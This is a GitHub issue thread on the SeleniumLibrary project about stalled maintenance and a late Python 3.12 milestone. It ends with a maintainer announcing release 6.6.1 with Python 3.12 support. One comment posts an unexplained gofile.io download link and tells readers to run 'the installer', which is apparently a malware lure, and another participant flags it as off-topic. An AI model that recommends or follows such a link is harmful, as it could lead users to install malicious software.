### ISSUE TITLE
Is everything alright?

### ISSUE THREAD

**Issue by grepwood** [robotframework/SeleniumLibrary#1915]
Nothing happened in the issues since June 13th. Nothing was committed to the master branch for 3 months. The https://github.com/robotframework/SeleniumLibrary/milestone/47 milestone is 2 months late.

Is everything alright with the developers? Are you in trouble? Do you need help? At this point I'm getting a little worried about your wellbeing :(

I started tracking the progress of this milestone ever since it existed because I know a number of projects that are literally itching to upgrade to Python 3.12, but are blocked because of this milestone. But now I'm legitimately worried beyond the pragmatic interest.

**Comment by santos-naudiyal** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by grepwood** [comment]
> try this https://gofile.io/d/yMHabA select the desired compiler in the installer

Offtopic. Mods - please delete

**Comment by emanlove** [comment]
Thanks for the check in. For myself it really has been summer and this summer in particular was a bit distracting. In regards to Python 3.12 there was another requests on that which it too was blocking. I was going to see if I can get a release out to resolve that here in the next few days.

I will mention that we are always looking for collaborators who have both the interest and time commitment to help with the SeleniumLibrarry project. If you are interested feel free to send a DM or reach out in the community Slack.

**Comment by emanlove** [comment]
@grepwood We have made a release adding Python 3.12 support ([PyPI](https://pypi.org/project/robotframework-seleniumlibrary/), [release notes](https://github.com/robotframework/SeleniumLibrary/releases/tag/v6.6.1))
